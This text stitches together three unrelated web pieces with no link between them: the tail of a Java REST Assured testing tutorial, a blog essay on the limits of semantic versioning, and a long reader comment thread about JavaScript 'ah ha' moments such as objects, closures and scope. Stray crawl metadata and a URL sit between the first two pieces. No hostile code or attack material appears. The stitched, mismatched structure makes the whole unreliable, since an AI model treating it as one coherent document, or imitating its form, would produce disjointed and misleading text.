.when().delete("/garage/slots/{slotID}").then() .statusCode(200); } This test has two REST calls. The first one is verified with the .body() method, but at the same time the .extract() method keeps the slot number. This slot number is then reused in the DELETE call, so that we unpark the car that has just entered. The garage can allocate any number to our car and the test is no longer hard-coded to use slot with number 27. Integrating REST Assured Tests in the Build Process REST Assured uses JUnit, so testing support in the build process is ready out of the box for the tools that support JUnit. It should be evident that REST Assured tests expect the application to be deployed, as they hit directly the HTTP endpoints. This makes REST tests different than plain unit tests, as they have requirements that are more complex than tests which depend only on Java source code. For a detailed tutorial on how to run REST tests in the build pipeline see the previous tutorial on splitting JUnit tests. Conclusion In this tutorial, we have written unit tests for the REST endpoints of a sample application using the Java library REST Assured. We have seen: - How to download and setup REST Assured via Maven, - How to make REST Assured test configurable so that we can select the host/port they check, - How to write basic unit tests that check HTTP error codes, - How REST Assured tests can send data in JSON format using Java maps, - How REST Assured tests can send data in JSON format using Java model classes, - How REST Assured tests can verify the response data with Hamcrest matchers, - How REST Assured tests can extract response information for further validations, and - How we can use REST Assured for tests that require multiple REST calls. Where to Go from Here We have just scratched the surface of REST Assured. There are several more features that can be used for REST testing: - Validating JSON responses according to a schema, - Working with XML data instead of JSON, - Using Groovy closures or Java 8 lambdas for validating responses, - Working with HTTP headers, - Working with cookies, - Posting form parameters, - Using timeouts in tests, - Testing different authentication methods and SSL, and - Writing custom (de)serializers. Even if our application has some special needs, there is a good chance that REST Assured has explicit support for that corner case or custom implementation. We hope that you now have a better understanding of REST Assured. If you have any questions or concerns, post them below. Feel free to share this tutorial with anyone you think might benefit from it.
https://semaphoreci.com/community/tutorials/testing-rest-endpoints-using-rest-assured
CC-MAIN-2019-47
refinedweb
3,437
53.92
From the late 1500’s onwards you start to see a trend appearing the the great estates of the time. A lot of the lords of the manor would construct whimsical or extravagant and typically useless structures to serve as conversion pieces or decorate a view. They were known as follies. The pepper-pot tower in Powerscourt Gardens, Co Wicklow, Ireland. Some of the best follies are the sham ruins, which pretend to be the remains of old buildings, but which were in fact constructed in that state (e.g. the Temple to Philosophy at Ermenonville). Every time somebody brings up Semantic Versioning I am reminded of these follies. Now don’t get me wrong, I love the ivory tower ideal that semantic versioning gives us. The patch version must be incremented if only backwards compatible big fixes are introduced. The minor version must be incremented if new backwards compatible functionality is introduced to the public API The major version must be incremented if any backwards incompatible changes are introduced to the public API. Lovely. Perfect. What could possible be wrong with that? Well for a start there is the real world… We rely on humans to decide on version numbering. Humans make mistakes. It’s very easy to make a mistake and have a method signature change in a non-backwards compatible way. And once you find out that 2.4.5 is actually not a drop in replacement for 2.4.4 with some minor bug fixes and should really have been called 3.0.0, your trust is gone. You are not going to trust that the project you are depending on understands semantic versioning and you are back to the old way. What’s that I hear you calling? Tooling to enforce semantic versioning? Hmmm, yes an appealing siren’s call is the tooling solution. Especially in Java, where we can use bytecode analysis. We download the previous version of the artifact and compare the bytecode of the two to ensure that the public API classes signatures only mutate in backwards compatible ways unless the major version number has changed. And if there are not changes to the public API, we allow the minor version to remain unmodified. Brilliant. I like that tooling. Very helpful. Still isn’t going to guarantee semantic versioning compliance though. In version 2.4.4 new FooBuilder().withoutBar().build() worked because you could build a Foo without a Bar in the implementation, but in 2.4.5 you can only build a Foo without a Bar if it has a Manchu, so new FooBuilder().withoutBar().withManchu(manchu).build() works as does new FooBuilder().withManchu(manchu).withoutBar().build() only my code is not written that way. To state it more bluntly, the public API is not just the classes and method signatures but the allowed patterns of usage of those classes and methods. If an API now requires that you make all calls to one set of methods from the same thread or while holding a lock on some other resource, that’s a backwards breaking change. Tooling cannot help you catch those changes. So yes tooling is great, but it will not stop the problem, namely that we have humans writing the code and humans deciding what the next version number is, and humans make mistakes. Then there is marketing… The version numbers that developers want to use have absolutely no relationship with the version numbers that Marketing want to use. Just look at Microsoft Windows: What’s that? You have a simple solution? We let marketing call it what ever the eff they want and we’ll call it the internal version number that we know it really is supposed to be! Hmmm, yes, another appealing siren is calling. Do you want to know what the problem is? I have a really simple example: I had to go and look up the mapping of Windows marketing versions to version numbers to get the table above. Now for something like an operating system it’s not too big of a deal, but when you get deep into the dependency hell and you have to select FooBar Ultra Pro 2012.7 from the issue tracker drop down in order to file a support ticket against foobar 2.4.3 telling them that there are issues when using it with Manchu 7R2 also known as manchu:5.3.9 you may start to feel the pain. At a former employers of mine we had a big A0 sheet on the wall with each of the supported release versions of all the various components that made up the different product lines. When you get to that level of insanity you know that something is wrong. Finally, on JVM, there is the classpath… Anyone who is not on the JVM, you have the great link time issue for dynamic libraries, though static linking can sometimes get you out of jail, it only works for so long… This issue crops up with Major version changes. As soon as you make a Major version change you are saying I no longer promise that the old API even exists let alone behaves the same as before Well that is fine, but if you don’t change the namespace of your API at the same time, then anyone using third-party code that happens to depend on the older version of your API is dead in the water. They have their code requiring the new API and also simultaneously requiring code that requires the older version of your API. That is the ultimate dependency hell. Changing namespace allows both versions to co-exist… but it also means that everyone has pain to adopt the new version… and you may be left trying to support two versions: the one you want to support and the one you didn’t want to with it’s ugly old API. So does that mean Semantic versioning is useless? Nope. It is actually a noble goal. An ideal we should all aim and strive for. Just keep in mind that you will never reach that goal. You will make mistakes. No amount of tooling or process you put in place will prevent the mistakes you will make, so when putting tooling or process in place be sure to evaluate the gain it is really giving you against the pain it is causing. For example using tooling to validate the bytecode changes of your public API against the previous version, when done right, is quick and an easy win… so adding that to your build is nice… you may not want it for every build, only a pre-flight check before releases or as run by the CI build server. On the other hand mandating code reviews of all code paths changed where each line of code changed is assessed for impact may not be a process you want to introduce for every project… (I’d hope it is there for the JVM runtime libraries though ;-) but the risk of breaking changes is very high in that public API) Hopefully this has got you thinking, and hopefully you will start to use some of the best practices encapsulated in Semantic Versioning within your own projects… but if you think I am going to trust a version range over semantic versions to let the machine automatically decide what version of a third party dependency my code will use… you are sadly mistaken. Version ranges are a hint to the human to let them know what range they should consider when manually specifying the version to use. .
https://www.cloudbees.com/blog/semantic-versioning-folly
CC-MAIN-2018-26
refinedweb
1,270
69.01
The! If you feel like you have a decent understanding of JavaScript, what was your "Ah ha!" moment? Or are you still waiting for it? For me, I had never written a line of JavaScript in my life but I picked up the book Learning jQuery and started reading it on a flight. I had the moment when I realized jQuery was essentially a "find something, do something" library. I already knew CSS, and jQuery used CSS selectors for the "find something" part. "Do something" in jQuery can be as simple as "click", "hide", "show", "slideToggle", etc. Even I can do that, I thought, and I rushed to my hotel room and started playing. For me that moment was when I realized that everything was an object. Me too! Think like object change everything! Chalk up one more for everything is an object. This also kind of went hand in hand with a DOM “ah ha!” later that day for very similar reasons. me too! i was totally stunned about that! :D Could someone elaborate on this? I’ve heard this before as being really important but still don’t quite understand. Thanks! Thanks @Charlie for your response. Indeed time is money and make no sense to go back in time to learn deprecated API when the entire world is looking forward to be ultra productive. When I was a kid I destroyed all my toys looking for the reasons of how they worked; and in the same way it makes me feel sad how many people uses jQuery every day without a real under of what is going on behind the scene. Do you know as @ezekiel stated JS is (in it own way) a 100% Object Oriented by itself? I wrote a thesis only with that research! Feel free to take a look at the website, located yet in the labs of my company. One more vote for everything is an object. Everything very simple after learning that. Realizing what ‘objects’ are helped me with ALL my programming. PHP has benefitted immensely, for example. My Aha-moment with javascript is yet to come, but I sure had one when I read that Salvi guy‘s comment! :) Its an object! Then suddenly it was all clear Definitely the “it’s an object!” moment. Totally changed how I write Javascript. I SO wish Javascript were object-oriented. Javascript, while object-based, is prototype-oriented. Now that doesn’t mean that you can’t do things with the language that make it *appear* object-oriented. You can. But it’s not part of the language syntax. 1 more for this But javascript is object oriented. It’s just not classical. Saying it’s not object oriented because there’s no classes is like saying there’s no variables just because there’s no strict typing. Everything is an object :) If you like that approach you should try Ruby. Numbers, code blocks, classes, and basically everything is an object. To be paradoxical, the Class of the Class object is itself. My javascript Ah-ha! moment was when I realized how similar it was to PHP. Set up variables, set up functions, grab from the dom, process, output…that’s about it. Me too! WOOT! go PHP!!! I think you will soon have an “Ah-ha” moment when you realize javascript and PHP are actually not similar. Client-side vs server-side… the only thing similar about them is that they are both programming languages. Mine was JavaScript closures. After blowing it on an interview. I knew I really had to get my head wrapped around closures. So if I may impart unto all here, this is my take on closures and I hope it helps: As I understand it, at a basic level, a closure is a returned function that encapsulates (not references) variables/values from the parent function that returned it. I hope my explanation is right and, if so I hope it helps someone here. A closure is the set of local variables that are kept alive after a function call* has completed, because those variables may still be required by a local function, and a reference to a local function has somehow been exported during the function call. The local function can be returned by the enclosing function, that’s one way of exporting its reference, but there are other common ways too, the local function can be attached to an event, pushed onto an array, anything to prevent it from being dereferenced once the enclosing function has completed. * doesn’t have to be functions, it can be any execution context, but let’s just leave it at function calls for now, shall we? A closure is effectively all the stuff that belongs to an expired execution context that cannot yet be discarded because there are still references to it. I can’t say I can describe getting closures as a JavaScript a-ha moment though, it was a separate a-ha moment altogether, beyond JavaScript. I mean, you can ‘get’ JavaScript a long time before getting closures, they’re pretty advanced. Most people discover closures completely by accident, do a bit of reading, and then start using them by design, still without fully getting them. Which makes it such a tricky interview question, because it’s the kind of thing people can use without really being able to explain. (And there are many difficult to read tutorials on the topic, which doesn’t help.) Now you have me wondering what kind of interview you can blow just by not understanding closures. They sound extremely important to advanced JavaScript understanding, but I’m a little surprised that you can blow an interview by not understanding them. It was closures and then some. Really advanced JS role I was applying for. @Lee Kowalkowski: A-haaa!! (well, here it is :D ) Closures, I know what they are but reading a written explanation still confuses me. Stoyan Stefanov draws you a diagram. I looked at that and the light in my head went on. It’s a brilliant book. Object Oriented Javascript by Stoyan Stefanov. Hmmm, most recently, a minor aha moment that I had was realizing how very little of the javascript that I work with should operate before DomReady. And the only way to do a great domready cross-browser is with something that has been tested, like jQuery’s domready functions, or the DomReady library that was taken out of jQuery. Essentially a realization that before jQuery, I was probably doing it all wrong anyway. Err, I meant to say that even .hide() or .show() need to be wrapped in domready. Sooooooooooooooooooooooo ….damn near everything except function declarations. Long live jQuery. 1. Everything is an object. 2. Closures. 3. Functions can be stored and passed around. Seconded. Once you can wrap your mind around these three things, you can go from “doing things with javascript” to “creating things with javascript”. same above three as well for me. Also ‘anonymous’ functions. One can just pass the entire function body to another function. Much the same as hector. My aha! moment is when I started learning to create objects in vanilla javascript. It really makes things click when you come to understand that a method is just a function inside of a function.My second aha! was when I started understanding that everything is an object. It’s funny that you post this because last night while I was re-designing my site I Googled jQuery to learn more about it. I’m now (6hours later) understanding a lot of it. So I guess my ah-ha moment would be when I realized that jQuery & JavaScript have so much potential and like metioned above, it’s just a object orientated language. I always got scared seeing it used on your site, now I’m ready! Actually, jquery is about “when something happens, find something, do something” because javascript is event-based. My Ah-ha! moment has yet to come, I guess xD Well, I disagree with your “JavaScript is event-based” statement… JavaScript is object oriented (prototype style) with some functional programming baked in. You can define how your document elements (objects) will behave when some event is triggered, but the event handlers are object properties… the DOM and browser window can trigger events, not the JS. I don’t remember ever having a javascript ah ha moment and I’ve been coding in it for several years. I think it’s because javascript is so lenient and functional it lets the programmers express themselves in a way that’s already familiar to them. mine was when I found that every operation returns a value. I was trying to create some sequential animations and everything kept running at once. I found an example out there in the vast interwebs that nested a function inside a function. My elements started moving the way I wanted them to and I was off and running. Everything started being fun after that. I started playing with JS in its early years in netscape, and everything was kinda fuzzy at that time, but my A-HA moment was when I discovered the relationship between DOM and JS Objects and you could access parents and siblings via methods. Basically it was a double-a-ha for me since the DOM idea clicked for me aswell. Come on guys that was 1998 or something :-) A few years back when I first started doing ajax requests by hand (not jQuery at the time). Until then everything I wrote was simply procedural/functional code, and I didn’t worry about event based or object-oriented patterns. This was also when I started learning how to avoid the old inline onClick='doEvent()'and start using unobtrusive JavaScript. I was looking into JavaScript on and then come to know about the concept of lambda functions and closures. It was mind-blowing. All the thanks to Mr. Crockford Like many others, understanding closures was when it all somehow clicked together. And even after I thought I knew javascript, reading Stoyan Stefanov’s “JavaScript Patterns” was full of small ah ha! moments. I second Stoyan’s book “Javascript Patterns”!! So many ah ha moments in that book that it’s essential for higher level javascript ! Well worth the price and goes a long way! Im just at the beginning of JavaScripts possibilities, but my recent JS AHA moment was, when I understood the concept of passing arguments to functions and the general use of OOP :-) Well, coming from the ActionScript world (don’t hate) what clicked for me was that DOM Elements are like MovieClips You just gave me an ActionScript moment. Too bad I have no need or desire to use it ever again. I had three major ah-ha moments in the various stages of expertise: 1. Before learning Javascript, code was always executed immediately and the only halting was done through user prompts. My first “ah ha” moment came when I realized code could be encapsulated in functions and attached to certain events. 2. My second “ah ha” moment came when I was able to separate the idea of Javascript from the DOM. DOM manipulation is just one use of Javascript, but it is not Javascript itself. 3. Finally, and more recently, the Douglas Crockford Yahoo videos have added a significant depth to my understanding. The mysterious things that jQuery and other libraries did finally made sense when I managed to grock the prototype chain and look at all data and functions as objects. The big moment for me was when I learned about the module pattern for creating objects in JS. That was my first taste of object-oriented JS, and changed my code from a pile of functions to a structured web application. I agree. Using design patterns was the eureka moment for me. They are a lot more vital to well written JavaScript than they are to PHP. The book that opened the door to me was Pro JavaScript Design Patterns by Dustin Diaz and Ross Harmes. Module pattern, yes! I think it has changed my view of javascript. Another vote for the module pattern here… however, I find myself using the revealing module pattern most of the time, to be specific. I am no JavaScript master.. tbh I am not really sure what closures are… though I may use them. I had two ah-ha’s so far. 1. Javascript is prototypal.. that word didn’t make sense to me until I realised it meant “almost object oriented”. 2. A lot of JavaScript directly targets the DOM. Before jQuery was around, or at least common, I had only used it for timers and the like. But libraries have made a lot of people do more things with the DOM than they would before. You had a jQuery ah-hah moment. The JS one is yet to come. I agree with a lot of people here: everything is an object, closures and when it comes to browser interaction (which jQuery makes very easy and very CSS-ish) event delegation is when I started to go YES! I have a JavaScript “AHA!” moment every time I use it. It’s the same each time. It’s: “Aha! I don’t know diddly-squat about this language!” :) (In other words, I probably learn something about JavaScript each and every time I use it.) That’s true for myself as well. And one thing is sure “Aha” moments are sweetness sent from the gods. ;) That’s one of the reasons I built, to share my JavaScript “Aha” moments and learn from other people’s “Aha” moments. And I believe we can agree that JavaScript has a lot of tricks and gotchas that can trigger an “Aha” moment. :) My AhHa was after working in Javascript for years, trying to look at the JQuery code and figure out what was going on. I realized (and probably already knew) that I only know about .05% of what I wished I knew in JavaScript. There are some truly talented and genius developers out there and I thank them for their hard work in helping to shape the web. Really though, some AhHa’s would have to be when I read how to modify styles through Javascript in JQuery, and upon reading how Pinterest did their Pin repositioning using javascript and math. Mine was when I found out that “$” was the name of the jQuery function and you were just passing parameters to it and it was doing all of the hard work to find those elements/objects. For the longest time I was using jQuery not really knowing what it was doing (yes I learned jQuery before JS). yes! the $ compreension is a cool sample of ah-ha moment! Still waiting for my ah-ha moment… Jamie, read “jquery types” article… after this, your ah-ha moment will come… Mine was when I had to make a flash menu that used a mysql database on a magento ecommerce site. I was very much learning actionScript, javaScript, php, and mysql all at the same time. I used php to list the menu items in a js variable that I then read through actionScript’s externalInterface class. The moment I got the ‘ah ha’ was when I finished and realized I could have made things much simpler without Flash. We all love the mighty jQuery, but those who never struggled with plain JS API, and learned how and WHY the client server scripts works, those in my perception have less possibilities to face a real, challenging Web programming environment. I had been working for more than 3 years with jQuery so far (and other three years without it), and I a lot of times I needed to load something with the my old document.getElementById() friend or parse an XML with a classic for, or create a CVS file reading for my old fiend the classic array. Summary: In order to fully understand jQuery and hence be able to fight vs. any jQuery uncovered situation (they are many, even if they are hard to find) it is a must to have an strong JS background. So… who is with me ? :-) That’s a very good point Salvi. It’s a bit like wanting to slam dunk without learning how to dribble. Fundamentals first, play of the day later. However, I’ve got so much to do and so little time. Most of us have to start where we are and get moving. I’m gonna stick with Coffeescript and jQuery and follow along from there. I simply don’t have the time to get to the fundamentals on Javascript. If I ever build something that backs me into one of the corners you describe, I’ll pay you a bunch of money to bail me out. Charlie, I used to say the same thing. I was stronger in jQuery, weak in natural JavaScript. For the longest time I was very able to code in jQuery and achieved desired results, but I also never really understood why they worked that way. I was then thrown into an envinronment that was chaotic jQuery and old school properly written javascript with objects, functions, loops, and the like. Let me tell you, I went from feeling like a savant to feeling like a monkey scratching his head. I think it’s also a misconception that jquery “saves people so much time”. To a degree, and for certain things, yes, but doing some things in standard JavaScript is actually faster, both coding wise and performance wise. Anyway, my point is don’t be so quick to dismiss fundamental JavaScript. You might be surprised when you need it. Also, if you don’t understand the fundamentals of JavaScript, you’re probably writing code thats horribly formatted & performs badly as well. Putting a bandaid on a flat tire might get you home, but it won’t get you to Canada. When I realize that almost everything is an object, and what is not, at least can behave like, and of course ‘closures’, once you get it, you can feel like you really know the language. Also I think I noticed too late that javascript has functional scope, I would have liked to know that since the beginning :S Just what the f**k “this” was referring to… Love this one. I have had this realization twice in the past two weeks. 1. If you call setTimeout, thisnow references window. so inside a function you have to do this: function someFun(){ var newThis = this; setTimeout(function(){ alert(newThis); }, 100); } The interesting thing is that the scope of the inner function is global but you can reference a local variable from inside the function. Weird?? 2. I recently started working with Backbone/Underscore and thischanges all the time and you really have to follow your scope My aha moment was when I unknowingly used closures in a process of finding solution to a problem. I was glad that I finally had a bit understanding of it after struggling for a long time. And also some aha moments while reading Stefanov’s OO Javascript .. Awesome book it is. – nice feed i’m working on a similar thing but all html related First off, I have to say – long time reader/lurker here but I just have to give kudos to you, Chris. Your posts are always on the leading edge of what’s new and fresh and I can not tell you how much I learn from CSS Tricks. So for that I want to thank you – a million times over. As for the question: …when I realize I haven’t missed any semicolons and everything works as I intended. Still waiting for it, I’m a newbie to jQuery and JS… can someone show me a path to rabbit hole? You should go take a look at Jeremy Keith’s book on Javascript, its called – “DOM Scripting – Web Design with javascript and the Document Object Model”. I’m currently going through it and so far its taught me a lot! (I’m a beginner with js too) Check out Nettuts “30 days to learn jQuery course” you’ll get a good start with that, then some of the other blogs will begin to make a little more sense, until you have your lightbulb moment and then they’ll all make sense. That when you create a new object, you (more or less) are creating a copy of its prototype. My “aha” moment has been comprised of several small ones. The biggest of those was the concept of creating classes in Javascript. ex. Your comment is an a-ha moment. I originally thought it was when I accessed the prototype of my own custom object of arrays. but this opens a new door for manipulating DOM that hadn’t considered. for me the biggest “ah ha” moment when I realize I can use console.log(something) instead of alert(something) and check it in the console, the moment I’m most frustrated is now over. 2nd one is how $(this) is different than ‘this’, sometimes I’m just confused about it and have to console.log(this) to make sure I’m on the right path. 3rd one probably is the operation with js, I didn’t realize that 1 + 1 can be 11 (as a string type ) in JS instead of 2 ( as a number)… for me that’s one of the coolest ah ha moment. But this doesn’t mean my “Ah-ha” stops, I think I probably will have many more “ah ha” moments while working with js / jquery in the new upcoming projects, that feeling of realizing something you should have is so special and I can’t wait to have it again The moment I learned that strings like “2.13” can be converted to number by adding + in front of it. For me it was scope / closures. It is the most common mistake for new comers. @Leo V – I have written a blog post introducing the basics of JavaScript from a .Net developers point of view. It may help you get started. Getting Started With JavaScript When I realized that you can call ‘new’ on a function to use it as a constructor for a new object. For me it was when taking this course just recently My moment came when I realized that I could use JavaScript as a steroid for CSS: I could add/remove classes and styles dynamically in ways that I couldn’t otherwise do. It’s weird though, the more I learn about JS the more aha moments I think I have left to unlock. My three biggest A-HA moments were: 1. Realizing just how malleable/flexible/powerful the combination of 1st class functions, prototypal inheritance and closures makes JavaScript. 2. When I decided to write a standalone version of a library that I’d originally written with a heavy jQuery dependency by writing my own ultra-minimal version jQuery, which lead me to read the source code of jQuery, Zepto and Underscore to see how they did their “magic”. 3.Writing code for node.js. My moment was when I made a texted based roleplaying game in raw javascript. I used js fake classes to make entities in the engine, with functions in the class member functions. It made making the game a lot easier. I don’t know a lot of plain JavaScript right now, but lately I’ve been having a huge jQuery “ah hah” moment. It’s all thanks to watching the net tuts “30 days to learn jQuery” course. I’m stalled on lessons 9 and 10 of 30, but that’s mostly because those lessons are having such a huge impact on me. I’ve been writing jQuery for years now, and was hired at my current job largely because I know a lot about jQuery, but what these lessons have shown me has got me completely re-thinking the way I write jQuery. My “ah hah!” moment has been that I can actually structure my jQuery cleanly. Saying that now, it sounds kind of obvious, but it’s having a huge impact on my code. In addition, I’ve learned a few structuring tips (mostly from the aforementioned course) which are contributing to much cleaner code on my part. I’m now caching any jQuery call I need to do more than once, rethinking the way I structure everything I do in jQuery, using functions and object oriented coding more, scoping my variables, using more control over “this”, and defining variables in comma separated lists. Overall, the result is that I’m writing about 1/4th the code in a lot of places, and am finding elements about 1/6th as often. In addition, I’ve just begun writing my first tiny jQuery plugins. When something needs to be done over and over, sometimes I write a tiny jQuery plugin instead of a function to take advantage of jQuery. I’m beginning to understand what it means to extend jQuery and modify the way things from jQuery work, and I finally understand how to use $.extend() to define defaults and then override them. All of this is taking my code to an entirely new place, with better human readability, faster execution, and much cleaner, leaner code. My ah ha moment recently was realising how little javascript I actually know! And realising it’s important for me to learn the basics as well as knowing how to do a bit of cool stuff with jquery. Another ah ha moment was realising about reusing and passing things to functions, and at the same time realising how way too long and messy my code had been :D but overall realising how many more ahha moments I have to come as I learn and improve :) I learned JS with jQuery as an entrypoint. A big step for me was learning how to use events and realizing that events can be triggered manually. Understanding OO in JS was also a big step. When I realized that I could use the Firebug/Chrome/IE console to quickly test any code or functions. – If I don’t remember how that function works, I test it in the console. – If I’m not sure about the syntax, I test it on the console. – If I don’t know if this piece of code is going to work, I test it on the console. ;) … when i found out, that “Everything is a Object” is only half of the truth. – the interpreter is one big, event-based eval-loop and from his point everything is a function. inside JS, “eval is evil” , but var f = new Function () { ... };is FTW, the same with var obj = new function() { ... } ‘new Function () { … }’ doesn’t work. It’d be ‘new Function (” …”)’, but that is just an alias for eval. You have all the problems with new Function as you do with eval. But you can make eval-free functions that do what you want pretty readily: (Indentation doesn’t seem to be preserved…) The other one is an interesting way to use a one-time constructor that I haven’t seen before. I’m going to add that to my list of useful patterns. @Havvy: yes, your’e right. it should be new Function ("..."). sorry for that. but its far more than an alias for eval(). eval() instantiates and executes in one step with no or little chance to prevent bad things to happen. with an encapsulated try/catch inside the “create Function”-block you can verify the new function before returning it to the calling context. invoking or binding it to a new context is a totally different step :-) the var obj = new function() {...}-constructor works nearly the same as a closure or immediately invoked function, but has some advantages (at least in my opinion). it allows private vars and functions inside the created object like the others, but accessing vars from its calling scope is way more predictable (the same with this) this comes in handy when doing crazy stuff like nesting this type of constructor and still having access to its base-calling scope’s vars. this way, you can have private, class-shared, protected and public (from the base-class-point-of-view) vars the easy way. but that’s far beyond clickety-find-do-DOM-stuff . . . I had quite a few “a-ha!” moments with js, but one of the biggest was understanding PHP hooks, which are basically very similar to js callbacks. My a-ha moment was when i realized that I can do object oriented javascript apps. This gave me a lot of more oppurtinities to look at the power of javascript. The more you dive deeper in it the more you want to experience. My javascript Ah-ha! moment was when I realized how scopes are working. Mine was when I realized that HTML elements were just that (elements) and that jQuery could find and affect these elements however I want. As said above, “find this, do that”. Havent found many uses for Js beyond manipulating the DOM, but I’m sure it will pop up someday and I’ll have another ah-HA moment. When Douglas Crockford called the trailing parentheses of an immediately invoked function ‘dog balls’ Ha ha ha! Hilarious!. I love how Douglas Crockford can present a dry topic like programming and interject just enough humor to keep the audience engaged. I saw this presentation and I disagree with Mr Crockford here (and not only here). He says that the reason why he puts parenthesis outside the invocation is that the whole invocation is important, not just function. But these parenthesis are not there to show what is important there. They are there to ensure that this is function expression in contrast to function statement. Invocation is always an expression, so there is no need to enclose it with parenthesis, ergo showing that this is expression. It just messes in heads ;) So at the end explaining that situation like Mr Crockford did is not helping understanding what really is going on in this language. For me the Javascript “Ah ha!” moment was just called JQuery. Even though it’s pretty wrong to call it that, cause knowing JQuery can make you think you can write Javascript, but that couldn’t be any further from the truth. JQuery just makes ir incredibly accessible by using the CSS selectors and convenience methods like slideUp/slideDown. Writing these in native Javascript would be a pain in the ass and most JQuery writers wouldn’t even know where to start. Of course, since JQuery is here to stay, this isn’t really an issue. As long as we’re not talking about Javascript performance (and mobile) that is. @bigbossSNK Hahaha, i laughed my balls of when i was watching this! #dogballs Mine was the moment I came into existence. This is exactly what I explain everytime people ask me how I learned web design! It’s that one moment where you suddenly see how it all works, and then everything becomes so much easier. I acctually learned most of the coding myself, just googling simple things like how to fetch a query in php (which btw, was my aha moment), and then I just kinda knew the language after a while. I have read several articles about Closures, but I had hard time understanding the concept. Once I read, it’s just about returning a function to the global namespace, that was my ah ha! moment. When i realized javascript has nothing to do wuth java I think I have had a couple over the last couple of years, but the one I am looking most forward to is one that hasn’t happened yet – wrapping my head around MVC in Javascript. I have a project where most of my prior Ah-ha moments have shown up, so I am looking forward to spending some time rebuilding it using MVC concepts. For me that moment was when I came to know about automatic semicolon insertion: Doughlas Crockford had rightly suggested to have starting curly brace on same line instead of new line: I started off with jQuery () but ever since I have started looking JavaScript seriously, I have fallen in love with it and have seen more than one aha moments :) FYI, here are other places where automatic semi-colon insertion takes place: var statement empty statement expression statement do-while statement continue statement break statement throw statement scope in closures works exactly how you think it would work if you forget all the nonsense object oriented languages have pushed in your head. This also made me much better at c# as I really understood lambdas. $.extend the captain obvious post on making javascript functions that return other functions learning a smattering of prolog and coming to understand how with boolean type coercion && and || are close cousins of the semi colon. dom events bubble up Wow, I think I’ve forgotten my personal JS a-ha! moments, but I’ll try a few basics: 1. DOM stuff (window, document, onclick etc), is not actually JavaScript, they’re things provided to JavaScript by the browser. That is where 99% of the cross-browser issues are with JavaScript, outside the DOM, it’s plain sailing in comparison as far as cross-browser compatability is concerned. 2. In a browser, everything is in the window object, so: Can be invoked by: or 3. Dot notation is interchangeable with bracket notation, therefore you can also: and therefore via a variable: 4. ‘in’ is not just for in a for loop, you can also use it as a test: 5. || and && do not return true or false, they return the last evaluated operand. 6. DOM collections are not array objects, (they’re not JavaScript remember?) also doing getElementsBy…() will return you a live collection. For example, when you reference .length it will evaluate the getElementsBy…() all over again to recalculate the length, so if you do the following, you will have an infinite loop: Pfft, that’s all I can think of right now, without getting too advanced. I’m a pretty hard-core software engineer…I’ve written safety-critical software for aircraft and submarines. And I’m still to have my JS ‘Aha!’ moment. But I know what it will be: it will be when I understand the damn scoping rules. I guess I’m just not used to using such a loosely-typed and event-driven language and I don’t get what’s in and out of scope , especially when you’re passing functions around as data to events. I’ve also stayed away from writing big apps in JavaScript so have never had an excuse to dig in to the finer details of scope and closures. One day. I prefer my submarine software writers use something a little more ‘better’ and leak proof. :) I think you just gave me mine when you described it as : a “find something, do something” library Thanks! (I’ll probably still let someone else write it though, I like CSS just fine. ) When I realised that it was actually a real, formal and complex language rather than the nasty little scripting thing that ran in browser clients (which how I had thought of it for the first few years of being a web dev) for me it was that JS was: prototypical event based (which was great with .. had closures that finally gave me the AHA oh and had first class functions Mine was when I learned that Ctrl F5 refreshes javascript in a browser. Sure it was long ago. My “aha moment” in javascript was when i realized that all in javascript is objects (i know it sounds silly…), like CSS many boxes with smaller boxes inside… jQuery is WOW library just because, it helps developers to develop a new way of thinking about javascript. All the others features are great but there are not the unique characteristic which made it WOW!!! A month or two ago, until then I just stumbled through it. It’s gone, html -> css -> php -> Javascript -> Jquery I think I’m close to the “Ah ha” moment, but still thumbing through and customizing open-source for now. I love jQuery! functional/logic programming; clousures; objects, objects everywere. I love how javascript “Ah-ha” moments have a tendency to invalidate each other. “Ah-ha! That’s how you force it to do X instead of Y!” “Ah-ha! Y is actually way better than X!” I guess the biggest Ah-ha was watching the Crockford videos and realizing it’s not broken, it’s just not conventional, and if you’re fighting the language then there’s probably a better way of doing things. man, I just had that jquery book on a flight ah Ha moment last weekend! awesome feeling. don’t know why I was so hesitant to start learning it… I really really liked it when I saw my own function just like JS built-in ones using the prototype property and I was really happy to know that i don’t have to install anything in my system to get JSON to work!! LOL For me, it was reading: DOM Scripting: Web Design with JavaScript and the Document Object Model by Jeremy Keith I still recommend this book to anyone who’s just getting started with Javascript. Seconded – a great book for getting started, and Jeremy has an awesome way of making things easy to understand especially if you’re more from a design background :) Kind of different “a-ha!” moments at different stages. My first was very much like Chris’s, except that rather than reading a book, I was blindly using a plugin that didn’t quite do what I wanted. I decided to look at the code, and since it was jQuery (which used CSS-like selectors) it was pretty intuitive. All I needed to do was change where the plugin was expecting a certain ID to expect a particular class, and it worked. I could change what was being found, and I could make different things happen with it. A-ha! Almost around the same time, it became clear how to pass values and objects around. For a few days, I honestly thought when I was seeing a function like function(foo, bar) in sample code that there was some sort of significance to the ‘foo’ and the ‘bar’ and I had to figure out what valid values could go there. ;-) Didn’t take long to smack my forehead, but it threw me for a loop at first, not having any sort of development background at all. Other pieces of learning were incremental. Starting to fold in ‘vanilla’ JavaScript as I learned it and when appropriate (this.id vs $(this).attr(‘id’) for example), understanding how to trouble-shoot timing issues and resolve race conditions. And then while I was actually trying to solve another problem (application namespacing to avoid polluting the global namespace) I really finally understood objects. So that’s really the second “a-ha!” moment. Since then I’ve been in another incremental learning phase, but I’m sure another a-ha moment isn’t far behind. Scope. 1) DOM 2) Anonymous functions 3) Coffeescript – anonymous functions – everything is an object – function scope – closures – self invoking functions Realising that it was all about the DOM, accessing it’s element and manipulating them in some way, whether it’s changing the appearance of something, adding an element to it or removing an element. From there everything is simplified to a question of working out the elements I want to work on, what their final state should be and what I want to do with them, and how to do it. Simples. Mine was understanding the use of ‘var’ keyword in javascript, variable hoisting, scope & prototypal inheritance. Discovering that null, undefined, 0, false (of course) and “” are all false-y and: is enough to test for a false-y variable! \o/ An ongoing chain of revelations: – sure the everything-is-an-object concept – short form of object declaration and instanciation by using brackets – breaking the same domain policy by using json/jsonp One favourite, though not a “now I understand” experience, was the fact that you can completely circumvent xmlhttp by re-using the src attribute of a known script object. Everything can be fetched from anywhere as long as you can encode it as js. Finally my feedreader webapp became possible. Currently reading this blog through it… my javascript ah-ha moment was jquery It was when I figured out how variable scopes worked in javascript. Like when you set a variable and then a closure, and then whenever that closure is called, it has access to that variable. when i realized that you could pass arguments into functions </code. when I realized that functions are also objects….. Same as you Chris, discovering jQuery and all it’s powers and 